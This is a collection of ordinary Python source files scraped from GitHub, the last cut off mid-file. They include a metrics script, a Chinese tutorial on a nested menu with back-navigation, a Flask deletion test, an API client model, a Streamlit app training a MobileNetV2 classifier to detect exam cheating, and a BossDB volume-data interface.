+{"seq_id":"19008021278","text":"\"\"\"\nMetrics on the results of the is_results_page algorithm run over the evaluation set\n\"\"\"\n\ndef stats_classification():\n labels_path = 'evaluation_set.csv'\n results_path = 'results_output.csv'\n\n false_positives = 0\n false_negatives = 0\n true_positives = 0\n true_negatives = 0\n\n with open(labels_path) as f_labels:\n with open(results_path) as f_results:\n labels = f_labels.readlines()\n results = f_results.readlines()\n\n for (label_, result_) in zip(labels, results):\n label = int(label_.split(',')[1].replace('\\n',''))\n if label > 0: label = True\n else: label = False\n result = result_.split(',')[1].replace('\\n','')\n if result == 'True': result = True\n else: result = False\n if label and result:\n true_positives += 1\n elif label and not result:\n false_negatives += 1\n elif not label and result:\n false_positives += 1\n else:\n true_negatives += 1\n\n total = true_negatives + true_positives + false_negatives + false_positives\n recall = true_positives / (true_positives + false_negatives)\n precision = true_positives / (true_positives + false_positives)\n accuracy = (true_negatives + true_positives) / total\n\n print('false positives: {}'.format(false_positives))\n print('false negatives: {}'.format(false_negatives))\n print('true positives: {}'.format(true_positives))\n print('true negatives: {}'.format(true_negatives))\n print('recall: {}'.format(recall))\n print('precision: {}'.format(precision))\n print('accuracy: {}'.format(accuracy))\n print('correctly identified: {}'.format(true_positives + true_negatives))\n print('total: {}'.format(total))\n\n\ndef stats_parsing():\n\n results_path = 'items_count.csv'\n\n correct_count = 0\n incorrect_count = 0\n total_posts = 0\n total_parsed_posts = 0\n\n with open(results_path) as f_results:\n lines = f_results.readlines()\n for line in lines:\n expected_count = int(line.split(',')[1].replace('\\n', ''))\n actual_count = int(line.split(',')[2].replace('\\n', ''))\n total_posts += expected_count\n total_parsed_posts += actual_count\n if expected_count == actual_count:\n correct_count += 1\n else:\n incorrect_count += 1\n\n total = correct_count + incorrect_count\n accuracy = float(correct_count) / float(total)\n\n print('accuracy: {}'.format(accuracy))\n print('correctly parsed pages count: {}'.format(correct_count))\n print('total pages: {}'.format(total))\n print('total parsed posts: {}'.format(total_parsed_posts))\n print('total posts: {}'.format(total_posts))\n print('percentage of posts parsed: {}'.format(float(total_parsed_posts)/float(total_posts)))\n\n\nif __name__ == \"__main__\":\n print('Classification:')\n stats_classification()\n print('\\n')\n print('Parsing:')\n stats_parsing()","repo_name":"fearnleymartin/knowledge-base","sub_path":"knowledge_base/tests/analyse_results.py","file_name":"analyse_results.py","file_ext":"py","file_size_in_byte":3102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"5169001547","text":"#这个是就是文艺(装逼)青年版, 来,我们加一个回退功能\nmenu = {\n\t'北京':{\n\t\t'海淀':{...},\n\t\t'昌平':{\n\t\t\t'沙河':{\n\t\t\t\t'老男孩':{...},\n\t\t\t\t'贼溜啊':{...},\t\n\t\t\t},\n\t\t\t'天通苑':{\n\t\t\t'这样':{\n\t\t\t'那样的':{...},\n\t\t\t'啥样的':{\n\t\t\t\t'王':{\n\t\t\t\t\t\n\t\t\t\t},\n\t\t\t\t'李':{...},\n\t\t\t},\n\t\t\t'高':{},\n\t\t\t'高手':{},\n\t\t\t},\n\t\t\t},\n\t\t\t'回龙观':{\n\t\t\t\n\t\t\t},\n\t\t},\n\t\t'朝阳':{...},\n\t\t'东城':{...},\n\t},\n\t'上海':{\n\t\t'闽行':{...},\n\t\t'闸北':{...},\n\t\t'浦东':{...},\n\t},\n\t'山东':{\n\t\t'济南':{\n\t\t\t\n\t\t\t'景点':{},\n\t\t\t'美食':{},\n\t\t\t'商场':{},\n\t\t\t'银行':{},\n\t\t\t'医院':{},\n\t\t\t'电影院':{},\n\t\t\t'KTV':{},\n\t\t\t'酒店':{},\n\t\t\t'加油站':{},\n\t\t},\n\t\t'青岛':{\n\t\t\n\t\t\t'景点':{},\n\t\t\t'美食':{},\n\t\t\t'商场':{},\n\t\t\t'银行':{},\n\t\t\t'医院':{},\n\t\t\t'电影院':{},\n\t\t\t'KTV':{},\n\t\t\t'酒店':{},\n\t\t\t'加油站':{},\n\t\t},\n\t\t'淄博':{...},\n\t\t'枣庄':{...},\n\t\t'东营':{...},\n\t\t'烟台':{\n\t\t\n\t\t\t'景点':{},\n\t\t\t'美食':{},\n\t\t\t'商场':{},\n\t\t\t'银行':{},\n\t\t\t'医院':{},\n\t\t\t'电影院':{},\n\t\t\t'KTV':{},\n\t\t\t'酒店':{},\n\t\t\t'加油站':{},\n\t\t},\n\t\t'潍坊':{...},\n\t\t'济宁':{...},\n\t\t'潍坊':{...},\n\t\t'泰安':{...},\n\t\t'威海':{...},\n\t\t'日照':{...},\n\t\t'莱芜':{...},\n\t},\n}\n#保存记录每一层的记录\ncurrent_layer = menu\n#我在这里加一条语句来记住上一层\n#last_layer = menu 不要这个了\nlayers = [] \n#layers 相当于一个列表\nwhile True:\n\tfor k in current_layer:\n\t\tprint(k)\n\tchoice = input(\">:\").strip()\n\tif not choice:continue\n\tif choice in current_layer:\n\t\t#进入之前要记住上一层\n\t\t#last_layer = current_layer\t\t\n\t\tlayers.append(current_layer)#进入下一层,保存当前层\n\t\tprint(layers)\n\t\tcurrent_layer = current_layer[choice]\t\t#[北京]\n\telif choice == 'b':\n\t\tif len(layers) != 0:\n\t\t\tcurrent_layer = layers.pop()\n\t\telse:\n\t\t\tprint(\"还退个锤子退,再退就过油子了\")\n\t\t#pass\t#这个pass就比较吊了#这个咋也不要了呢???\n\t\t\n\t\t#搞定了,随便怎么回了现在 牛逼吧,现在还是有点瑕疵 就是 最外层不能回退 要是回退就报错了\n\t\t\n#现在问题来了,怎么退回去,这一层就是第二层,进来之后就是这一层了,程序已经不记得上一层了怎么回去??? 那要是记住好像能行么?那第三层能记住最外层么?\n\t\t#current_layer = current_layer[choice]\n\t\t#wow 我靠 ,牛逼牛逼,哎等会儿,调试出bug了,这怎么只能回退一次呢???这可咋整,不管进入多少步?都只能退一回,程序只能记住上一个层级.额 (⊙o⊙)… 还是不行啊,他不能再往回走,咋整吧\t其实我想的是这样,我一路走过去,再一路返回去 \n# 好了我来提供一个新的思路:\n\t# 来把进入的每一层都保存下来就完了嘛\n\t\n#看到了吧,这短短10多行代码,就解决这个问题了,其实那个存层级的列表,也还可以优化,因为每进入一个列表就要存一层,还是能优化的,现在这个程度已经稍微高级一点了儿\n# 行了 就到这儿了","repo_name":"victorfengming/python_projects","sub_path":"history_pro/python_luffy/Luffy_study_my_code/作业详解/三级菜单/三级菜单作业讲解之装逼版(下).py","file_name":"三级菜单作业讲解之装逼版(下).py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"33385468796","text":"from flask import url_for\nfrom sih.tests import TestCase, logged_as\nfrom sih.extensions import db\nfrom sih.modules.stations.models import Station, Source\n\n\nclass StationsDeleteTestCase(TestCase):\n\n def test_permission_required(self):\n response = self.client.post(url_for('stations.stations_delete',\n station_id=1))\n self.assert403(response)\n\n @logged_as('admin', 'test')\n def test_station_not_found(self):\n response = self.client.post(url_for('stations.stations_delete',\n station_id=1))\n self.assert404(response)\n\n @logged_as('admin', 'test')\n def test_delete_station(self):\n source = Source(name='Test 1', identifier='test1',\n url='http://example.com', license='OpenData')\n\n station = Station(id=1, name='Test 1', code='test1',\n kind=['pluviometric'], source=source,\n altitude=10)\n db.session.add(station)\n\n url = url_for('stations.stations_delete', station_id=1)\n response = self.client.post(url)\n\n self.assertRedirects(response, url_for('stations.stations_list'))\n self.assertEqual(Station.query.count(), 0)\n","repo_name":"ecarrara/sih","sub_path":"sih/modules/stations/tests/views/stations/delete_test.py","file_name":"delete_test.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"15080984344","text":"from typing import Any, Dict, List, Type, TypeVar\n\nfrom attrs import define, field\n\nT = TypeVar(\"T\", bound=\"NewServiceResponse\")\n\n\n@define\nclass NewServiceResponse:\n \"\"\"Response to a service creation request.\n\n Attributes:\n service_id (str): Unique service id.\n \"\"\"\n\n service_id: str\n additional_properties: Dict[str, Any] = field(init=False, factory=dict)\n\n def to_dict(self) -> Dict[str, Any]:\n service_id = self.service_id\n\n field_dict: Dict[str, Any] = {}\n field_dict.update(self.additional_properties)\n field_dict.update(\n {\n \"service_id\": service_id,\n }\n )\n\n return field_dict\n\n @classmethod\n def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:\n d = src_dict.copy()\n service_id = d.pop(\"service_id\")\n\n new_service_response = cls(\n service_id=service_id,\n )\n\n new_service_response.additional_properties = d\n return new_service_response\n\n @property\n def additional_keys(self) -> List[str]:\n return list(self.additional_properties.keys())\n\n def __getitem__(self, key: str) -> Any:\n return self.additional_properties[key]\n\n def __setitem__(self, key: str, value: Any) -> None:\n self.additional_properties[key] = value\n\n def __delitem__(self, key: str) -> None:\n del self.additional_properties[key]\n\n def __contains__(self, key: str) -> bool:\n return key in self.additional_properties\n","repo_name":"feldera/feldera","sub_path":"python/feldera-api-client/feldera_api_client/models/new_service_response.py","file_name":"new_service_response.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":161,"dataset":"github-code","pt":"91"}
+{"seq_id":"2887233333","text":"import numpy as np\nimport pandas as pd\nimport itertools\nimport tensorflow as tf\nimport streamlit as st\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.preprocessing.image import img_to_array\nfrom tensorflow.keras.applications import MobileNetV2\nfrom tensorflow.keras.layers import MaxPooling2D\nfrom tensorflow.keras.layers import Conv2D\nfrom tensorflow.keras.layers import Flatten\nfrom tensorflow.keras.layers import Input\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras.optimizers import Adam\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.model_selection import StratifiedKFold\nfrom PIL import Image, ImageOps\nimport matplotlib.pyplot as plt\n\nFPS = 25\nIMAGE_HEIGHT, IMAGE_WIDTH = 224, 224\nCLASSES_DICT = {0: 'No Cheat', 1: 'Read Text',\n 2: 'Ask Friend', 5: 'Call Friend'}\nCLASSES_LIST = ['No Cheat', 'Read Text', 'Ask Friend', 'Call Friend']\nMODEL_OUTPUT_SIZE = len(CLASSES_LIST)\nBASE_DIR = './model'\n\nst.set_page_config(page_title='Human Activity Recognition')\nst.set_option('deprecation.showfileUploaderEncoding', False)\n\n\ndef local_css(file_name):\n with open(file_name) as f:\n st.markdown(f'', unsafe_allow_html=True)\n\n\nlocal_css('./style/style.css')\n\nst.sidebar.write(\n 'Human Activity Recognition Berdasarkan Webcam Menggunakan Metode MobileNet')\n\nmenu_name = st.sidebar.selectbox(\n 'Pilih Menu', ['Halaman Depan', 'Simulasi Pelatihan Model', 'Prediksi Gambar'])\n\ndef image_classification(filename):\n model = load_model(f'{BASE_DIR}/checkpoint/HAR_MobileNetV2_Model_Best.h5', compile=False)\n size = (IMAGE_HEIGHT, IMAGE_WIDTH)\n img = ImageOps.fit(filename, size, Image.ANTIALIAS)\n img = img_to_array(img)\n img = img.reshape(1, IMAGE_HEIGHT, IMAGE_WIDTH, 3)\n img = img.astype('float32')\n img = img / 255.0\n prediction = model.predict(img)\n prediction = prediction[0]\n predicted_labels_probabilities_averaged_sorted_indexes = np.argsort(prediction)[\n ::-1]\n\n st.write('#### Prediksi Kelas dan Probabilitas-nya pada Gambar:')\n for predicted_label in predicted_labels_probabilities_averaged_sorted_indexes:\n predicted_class_name = CLASSES_LIST[predicted_label]\n predicted_probability = prediction[predicted_label]\n st.write(\n f'{predicted_class_name}: {(predicted_probability * 100):.2f}%')\n\ndef get_model_name(fold_var_new):\n return f'{BASE_DIR}/checkpoint/HAR_MobileNetV2_Model_fold-{str(fold_var_new)}.h5'\n\n\ndef get_model(fold_var_new, dense_layer_new, init_lr_new, epochs_new):\n st.write('---')\n st.write(f'#### [INFO] Membangun Model Fold-{str(fold_var_new)}')\n baseModel = MobileNetV2(weights='imagenet',\n include_top=False,\n input_tensor=Input(\n shape=(IMAGE_HEIGHT, IMAGE_WIDTH, 3)),\n input_shape=(IMAGE_HEIGHT, IMAGE_WIDTH, 3),\n classes=MODEL_OUTPUT_SIZE)\n baseModel.trainable = False\n\n headModel = baseModel.output\n headModel = Conv2D(100, (3, 3), activation='relu', input_shape=(\n IMAGE_HEIGHT, IMAGE_WIDTH, 3))(headModel)\n headModel = MaxPooling2D(pool_size=(2, 2))(headModel)\n headModel = Flatten(name='flatten')(headModel)\n if dense_layer_new == 1:\n headModel = Dense(512, activation='relu',\n name='dense_layer_1')(headModel)\n if dense_layer_new == 3:\n headModel = Dense(1024, activation='relu',\n name='dense_layer_1')(headModel)\n headModel = Dense(1024, activation='relu',\n name='dense_layer_2')(headModel)\n headModel = Dense(512, activation='relu',\n name='dense_layer_3')(headModel)\n if dense_layer_new == 5:\n headModel = Dense(2048, activation='relu',\n name='dense_layer_1')(headModel)\n headModel = Dense(2048, activation='relu',\n name='dense_layer_2')(headModel)\n headModel = Dense(1024, activation='relu',\n name='dense_layer_3')(headModel)\n headModel = Dense(1024, activation='relu',\n name='dense_layer_4')(headModel)\n headModel = Dense(512, activation='relu',\n name='dense_layer_5')(headModel)\n if dense_layer_new == 7:\n headModel = Dense(4096, activation='relu',\n name='dense_layer_1')(headModel)\n headModel = Dense(4096, activation='relu',\n name='dense_layer_2')(headModel)\n headModel = Dense(2048, activation='relu',\n name='dense_layer_3')(headModel)\n headModel = Dense(2048, activation='relu',\n name='dense_layer_4')(headModel)\n headModel = Dense(1024, activation='relu',\n name='dense_layer_5')(headModel)\n headModel = Dense(1024, activation='relu',\n name='dense_layer_6')(headModel)\n headModel = Dense(512, activation='relu',\n name='dense_layer_7')(headModel)\n headModel = Dense(MODEL_OUTPUT_SIZE, activation='softmax',\n name='dense_layer_out')(headModel)\n\n model = Model(inputs=baseModel.input, outputs=headModel)\n for layer in baseModel.layers:\n layer.trainable = False\n\n opt = Adam(learning_rate=init_lr_new, decay=init_lr_new / epochs_new)\n model.compile(loss='categorical_crossentropy',\n optimizer=opt, metrics=['accuracy'])\n\n return model\n\n\ndef plot_history(H, fold_var_new):\n st.write('---')\n st.write(f'#### [INFO] Plot Fold-{str(fold_var_new)}')\n plt.style.use('ggplot')\n plt.figure()\n plt.plot(range(1, len(H.history['loss'])+1),\n H.history['loss'], label='train_loss')\n plt.plot(range(1, len(H.history['val_loss'])+1),\n H.history['val_loss'], label='val_loss')\n plt.title('Training and Validation Loss')\n plt.xlabel('Epoch')\n plt.ylabel('Value')\n plt.legend(loc='upper right', bbox_to_anchor=(1.25, 1))\n savefig_dir = f'{BASE_DIR}/plot/plot_loss_fold-{str(fold_var_new)}.png'\n plt.savefig(savefig_dir, bbox_inches='tight')\n image = Image.open(savefig_dir)\n st.write('Plot Pelatihan dan Validasi Loss')\n st.image(image, use_column_width=True)\n\n plt.style.use('ggplot')\n plt.figure()\n plt.plot(range(1, len(H.history['accuracy'])+1),\n H.history['accuracy'], label='train_acc')\n plt.plot(range(1, len(H.history['val_accuracy'])+1),\n H.history['val_accuracy'], label='val_acc')\n plt.title('Training and Validation Accuracy')\n plt.xlabel('Epoch')\n plt.ylabel('Value')\n plt.legend(loc='upper right', bbox_to_anchor=(1.25, 1))\n savefig_dir = f'{BASE_DIR}/plot/plot_accuracy_fold-{str(fold_var_new)}.png'\n plt.savefig(savefig_dir, bbox_inches='tight')\n image = Image.open(savefig_dir)\n st.write('Plot Pelatihan dan Validasi Akurasi')\n st.image(image, use_column_width=True)\n\ndef plot_confusion_matrix(cm, classes, fold_var_new, normalize=True, title='Confusion Matrix', cmap=plt.cm.Blues):\n st.write('---')\n st.write(f'#### [INFO] Confusion Matrix Fold-{str(fold_var_new)}')\n plt.figure(figsize=(10, 10))\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n if normalize:\n cm = cm.astype('float')/cm.sum(axis=1)[:, np.newaxis]\n cm = np.around(cm, decimals=2)\n cm[np.isnan(cm)] = 0.0\n st.write(f'Normalized Confusion Matrix')\n else:\n st.write(f'Confusion Matrix, Without Normalization')\n\n thresh = cm.max()/2.\n\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, cm[i, j], horizontalalignment='center',\n color='white' if cm[i, j] > thresh else 'black')\n\n plt.tight_layout()\n plt.ylabel('True Label')\n plt.xlabel('Predicted Label')\n if normalize:\n savefig_dir = f'{BASE_DIR}/plot/plot_confusion_matrix_normalized_fold-{str(fold_var_new)}.png'\n else:\n savefig_dir = f'{BASE_DIR}/plot/plot_confusion_matrix_fold-{str(fold_var_new)}.png'\n plt.savefig(savefig_dir, bbox_inches='tight')\n image = Image.open(savefig_dir)\n st.image(image, use_column_width=True)\n\n\nif menu_name == 'Halaman Depan':\n st.write('## Halaman Depan')\n st.write('---')\n st.write('#### Judul Skripsi:')\n st.write(\n '#### Human Activity Recognition Berdasarkan Webcam Menggunakan Metode MobileNet')\n st.write('---')\n st.write('#### Abstrak:')\n st.markdown('
Manusia tidak bisa terlepas dari aktivitas sehari-hari yang mana merupakan bagian dari aktivitas kehidupan manusia. Human Activity Recognition (HAR) atau pengenalan aktivitas manusia saat ini merupakan salah satu topik yang sedang banyak diteliti seiring dengan pesatnya kemajuan di bidang teknologi yang berkembang saat ini. Hampir semua bidang terdampak dari pandemi COVID-19 yang mempengaruhi aktivitas manusia sehingga menjadi lebih terbatas. Salah satu bidang yang paling terdampak yaitu pendidikan, di mana kampus menerapkan sistem pembelajaran daring, sehingga dosen lebih sulit untuk mengawasi pembelajaran maupun ujian yang dilakukan secara daring karena tidak dapat mengawasi aktivitas yang dilakukan mahasiswa secara langsung.
', unsafe_allow_html=True)\n\nif menu_name == 'Simulasi Pelatihan Model':\n st.write('## Simulasi Pelatihan Model')\n st.write('---')\n st.warning('Catatan:\\nData yang digunakan pada simulasi pelatihan dan pengujian model pada halaman ini menggunakan 10% dari data yang digunakan pada penelitian.')\n st.write('---')\n st.write('#### Atur Hyperparameter')\n init_lr_new = st.select_slider(\n 'Learning Rate', options=[1e-1, 1e-2, 1e-3, 1e-4, 1e-5], value=1e-1)\n epochs_new = st.slider('Epochs', min_value=2, max_value=40, value=2, step=1)\n early_stopping_new = st.slider('Early Stopping Patience', min_value=1,\n max_value=40, value=10, step=1)\n batch_size_new = st.select_slider(\n 'Batch Size', options=[8, 16, 32, 64, 128, 256], value=8)\n dense_layer_new = st.select_slider(\n 'Dense Layer', options=[1, 3, 5, 7], value=1)\n st.write('---')\n st.write(f'''\\n#### Cek Hyperparameter yang Diatur\n \\nLearning Rate: {init_lr_new}\n \\nEpochs: {epochs_new}\n \\nEarly Stopping: {early_stopping_new}\n \\nBatch Size: {batch_size_new}\n \\nDense Layer: {dense_layer_new}''', unsafe_allow_html=True)\n if dense_layer_new == 1:\n st.code(\n f'''Dense(512, activation='relu', name='dense_layer_1')''', language='python')\n if dense_layer_new == 3:\n st.code(f'''Dense(1024, activation='relu', name='dense_layer_1')\\nDense(1024, activation='relu', name='dense_layer_2')\\nDense(512, activation='relu', name='dense_layer_3')''', language='python')\n if dense_layer_new == 5:\n st.code(f'''Dense(2048, activation='relu', name='dense_layer_1')\\nDense(2048, activation='relu', name='dense_layer_2')\\nDense(1024, activation='relu', name='dense_layer_3')\\nDense(1024, activation='relu', name='dense_layer_4')\\nDense(512, activation='relu', name='dense_layer_5')''', language='python')\n if dense_layer_new == 7:\n st.code(f'''Dense(4096, activation='relu', name='dense_layer_1')\\nDense(4096, activation='relu', name='dense_layer_2')\\nDense(2048, activation='relu', name='dense_layer_3')\\nDense(2048, activation='relu', name='dense_layer_4')\\nDense(1024, activation='relu', name='dense_layer_5')\\nDense(1024, activation='relu', name='dense_layer_6')\\nDense(512, activation='relu', name='dense_layer_7')''', language='python')\n\n if st.button('Jalankan Model'):\n train_datagen = ImageDataGenerator(\n rotation_range=10,\n width_shift_range=0.1,\n height_shift_range=0.1,\n shear_range=0.1,\n zoom_range=[0.9, 1.0],\n fill_mode='nearest',\n horizontal_flip=True,\n vertical_flip=True,\n rescale=1./255)\n\n test_datagen = ImageDataGenerator(rescale=1./255)\n\n train_data = pd.read_csv(\n f'{BASE_DIR}/data/split_perdata/train_labels.csv')\n test_data = pd.read_csv(\n f'{BASE_DIR}/data/split_perdata/test_labels.csv')\n\n train_y = train_data.label\n train_x = train_data.drop(['label'], axis=1)\n\n skf = StratifiedKFold(n_splits=3, shuffle=True, random_state=47)\n data_kfold = pd.DataFrame()\n\n validation_accuracy = []\n validation_loss = []\n fold_var_new = 1\n\n for train_index, val_index in list(skf.split(train_x, train_y)):\n training_data = train_data.iloc[train_index]\n validation_data = train_data.iloc[val_index]\n\n train_data_generator = train_datagen.flow_from_dataframe(\n training_data,\n directory=f'{BASE_DIR}/data/split_perdata/train/',\n x_col='filename',\n y_col='label',\n target_size=(IMAGE_HEIGHT, IMAGE_WIDTH),\n color_mode='rgb',\n class_mode='categorical',\n batch_size=batch_size_new,\n shuffle=True)\n valid_data_generator = train_datagen.flow_from_dataframe(\n validation_data,\n directory=f'{BASE_DIR}/data/split_perdata/train/',\n x_col='filename',\n y_col='label',\n target_size=(IMAGE_HEIGHT, IMAGE_WIDTH),\n color_mode='rgb',\n class_mode='categorical',\n batch_size=batch_size_new,\n shuffle=True)\n\n model = get_model(fold_var_new, dense_layer_new,\n init_lr_new, epochs_new)\n checkpoint = tf.keras.callbacks.ModelCheckpoint(\n get_model_name(fold_var_new),\n monitor='val_accuracy',\n verbose=1,\n save_best_only=True,\n mode='max')\n early_stopping = tf.keras.callbacks.EarlyStopping(\n monitor='val_accuracy',\n patience=early_stopping_new,\n verbose=1,\n mode='auto',\n baseline=None)\n\n placeholder = st.empty()\n placeholder.write('Pelatihan dan Pengujian Model Sedang Diproses')\n with st.spinner('Silahkan Tunggu ...'):\n history = model.fit(train_data_generator,\n steps_per_epoch=train_data_generator.samples // train_data_generator.batch_size,\n epochs=epochs_new,\n validation_data=valid_data_generator,\n validation_steps=valid_data_generator.samples // valid_data_generator.batch_size,\n verbose=1,\n callbacks=[checkpoint, early_stopping])\n plot_history(history, fold_var_new)\n placeholder.empty()\n\n model.load_weights(\n f'{BASE_DIR}/checkpoint/HAR_MobileNetV2_Model_fold-{str(fold_var_new)}.h5')\n\n test_data_generator = test_datagen.flow_from_dataframe(\n test_data,\n directory=f'{BASE_DIR}/data/split_perdata/test/',\n x_col='filename',\n y_col='label',\n target_size=(IMAGE_HEIGHT, IMAGE_WIDTH),\n color_mode='rgb',\n class_mode='categorical',\n batch_size=batch_size_new,\n shuffle=False)\n test_data_generator.reset()\n test_steps_per_epoch = np.math.ceil(\n test_data_generator.samples / test_data_generator.batch_size)\n predictions = model.predict_generator(\n test_data_generator, steps=test_steps_per_epoch)\n predicted_classes = np.argmax(predictions, axis=1)\n true_classes = test_data_generator.classes\n class_labels = list(test_data_generator.class_indices.keys())\n\n cm = confusion_matrix(true_classes, predicted_classes)\n plot_confusion_matrix(\n cm, class_labels, fold_var_new, normalize=True)\n\n st.write('---')\n st.write(\n f'#### [INFO] Classification Report Fold-{str(fold_var_new)}')\n report = classification_report(\n true_classes, predicted_classes, target_names=class_labels, output_dict=True)\n report_df = pd.DataFrame(report).transpose()\n st.dataframe(report_df)\n\n data_kfold[fold_var_new] = predicted_classes\n st.write('---')\n st.write(f'#### [INFO] Fold {fold_var_new} Selesai Dijalankan')\n if fold_var_new == 3:\n st.write('---')\n st.success('Pelatihan dan Pengujian Model Selesai Dijalankan')\n tf.keras.backend.clear_session()\n fold_var_new += 1\n\nif menu_name == 'Prediksi Gambar':\n st.write('## Prediksi Gambar')\n st.write('---')\n uploaded_image = st.file_uploader(\n 'Silahkan Pilih Gambar yang Ingin Diprediksi', type=['jpg', 'png'])\n if uploaded_image is not None:\n image = Image.open(uploaded_image)\n st.write('---')\n st.write('#### Gambar yang Diupload:')\n st.image(image, use_column_width=True)\n st.write('---')\n placeholder = st.empty()\n placeholder.write('Prediksi Sedang Diproses')\n image_classification(image)\n placeholder.empty()","repo_name":"fauzanakmalh1/har_code_1","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":17989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"18497580247","text":"import logging\nimport os\nfrom pathlib import Path\nfrom typing import Optional, Tuple, Union\n\nimport numpy as np\nfrom element_interface.utils import find_full_path\nfrom intern import array\nfrom PIL import Image\nfrom PIL.Image import _fromarray_typemap\nfrom requests import HTTPError\n\nfrom .. import volume\nfrom ..bossdb import BossDBURLs\n\nlogger = logging.getLogger(\"datajoint\")\n\n\nclass BossDBInterface(array):\n def __init__(\n self,\n channel: Union[Tuple, str],\n session_key: Optional[dict] = None,\n volume_id: Optional[str] = None,\n **kwargs,\n ) -> None:\n\n try:\n super().__init__(channel=channel, **kwargs)\n self._exists = True\n except HTTPError as e:\n if e.response.status_code == 404 and not kwargs.get(\"create_new\", False):\n self._exists = False\n return\n else:\n raise e\n\n self._session_key = session_key or dict()\n\n # If not passed resolution or volume IDs, use the following defaults:\n self._volume_key = dict(\n volume_id=volume_id or self.collection_name + \"/\" + self.experiment_name,\n resolution_id=self.resolution,\n )\n\n @property\n def exists(self):\n return self._exists\n\n def _infer_session_dir(self):\n root_dir = volume.get_vol_root_data_dir()[0]\n inferred_dir = (\n f\"{self.collection_name}/{self.experiment_name}/{self.channel_name}/\"\n )\n os.makedirs(Path(root_dir) / inferred_dir, exist_ok=True)\n return inferred_dir\n\n def _import_resolution(self, skip_duplicates=True):\n volume.Resolution.insert1(\n dict(\n resolution_id=self.resolution, # integer 0-6\n voxel_unit=self.voxel_unit, # axis order is either ZYX or XYZ\n voxel_z_size=self.voxel_size[0 if self.axis_order[0] == \"Z\" else 2],\n voxel_y_size=self.voxel_size[1],\n voxel_x_size=self.voxel_size[2 if self.axis_order[0] == \"Z\" else 0],\n ),\n skip_duplicates=skip_duplicates,\n )\n\n def _import_volume(self, data: np.ndarray = None, skip_duplicates=True):\n volume.Volume.insert1(\n dict(\n **self._session_key,\n **self._volume_key,\n z_size=self.shape[0 if self.axis_order[0] == \"Z\" else 2],\n y_size=self.shape[1],\n x_size=self.shape[2 if self.axis_order[0] == \"Z\" else 0],\n channel=self.channel_name,\n collection_experiment=f\"{self.collection_name}_{self.experiment_name}\",\n url=f\"bossdb://{self._channel.get_cutout_route()}\",\n volume_data=data,\n ),\n skip_duplicates=skip_duplicates,\n )\n\n def _import_segmentation(self, data: np.ndarray = None, skip_duplicates=True):\n volume.Segmentation.insert1(\n dict(**self._volume_key, segmentation_data=data),\n skip_duplicates=skip_duplicates,\n allow_direct_insert=True,\n )\n\n def _string_to_slice_key(self, string_key: str) -> Tuple:\n output = tuple()\n items = string_key.strip(\"[]\").split(\",\")\n for index, item in enumerate(items):\n if item == \":\": # select all for dimension\n start, stop = (0, self.shape[index])\n elif \":\" in item: # select slice of dimension\n start, stop = list(map(int, item.split(\":\")))\n else: # select a single slice\n start = int(item)\n stop = start + 1\n output = (*output, slice(start, stop))\n if len(output) == 1: # If only on dimension provided, assume Z\n if self.axis_order[0] == \"Z\":\n return (output[0], slice(0, self.shape[1]), slice(0, self.shape[1]))\n else:\n return (slice(0, self.shape[0]), slice(0, self.shape[1]), output[0])\n return output\n\n def _slice_key_to_string(self, slice_key: Tuple[Union[int, slice]]) -> str:\n outputs = []\n for item in slice_key:\n if item.stop == item.start + 1:\n outputs.append(f\"{item.start}\")\n else:\n outputs.append(f\"{item.start}:{item.stop}\")\n return \"[\" + \",\".join(outputs) + \"]\"\n\n def _download_slices(\n self,\n slice_key: Tuple[Union[int, slice]],\n data: np.ndarray,\n extension: str = \".png\",\n image_mode: str = None,\n ):\n\n xs, ys, zs = self._normalize_key(key=slice_key)\n zoom = f\"ZoomX{xs[0]}-{xs[1]}_Y{ys[0]}-{ys[1]}\"\n\n # If associated session, use that dir. Else infer and mkdir\n if self._session_key:\n session_path = volume.get_session_directory(self._session_key)\n else:\n session_path = self._infer_session_dir()\n file_name = f\"Res{self.resolution}_{zoom}_Z%d{extension}\"\n file_path = find_full_path(volume.get_vol_root_data_dir(), session_path)\n file_path_full = str(file_path / file_name)\n\n if len(data.shape) == 1: # if getitem returned single array, try unwrapping\n data = data[0]\n if len(data.shape) == 2: # getitem returned single z-slice\n data = data[np.newaxis, :]\n\n for z in range(zs[0], zs[1]):\n # Z is used as absolute reference within dataset.\n # When saving data, 0-indexed based on slices fetched\n Image.fromarray(data[z - zs[0]], mode=image_mode).save(file_path_full % z)\n logger.info(f\"Saved Z-slices {zs[0]} to {zs[1]}:\\n{file_path}/\")\n\n def insert_channel_as_url(self, data_channel=\"Volume\", skip_duplicates=True):\n collection_key = dict(\n collection_experiment=self.collection_name + \"_\" + self.experiment_name\n )\n with BossDBURLs.connection.transaction:\n BossDBURLs.insert1(collection_key, skip_duplicates=skip_duplicates)\n getattr(BossDBURLs, data_channel).insert1(\n dict(\n url=f\"bossdb://{self._channel.get_cutout_route()}\", **collection_key\n ),\n skip_duplicates=skip_duplicates,\n )\n\n def load_data_into_element(\n self,\n table: str = \"Volume\",\n slice_key: Union[Tuple[Union[int, slice]], str] = \"[:]\", # Default full data\n save_images: bool = False,\n save_ndarray: bool = False,\n extension: str = \".png\",\n skip_duplicates=False,\n image_mode=None,\n ):\n # NOTE: By accepting a slice here, we could download pngs and/or store ndarrays\n # that are a subset of the full volume with x and y start/stop limits. These\n # limits are not 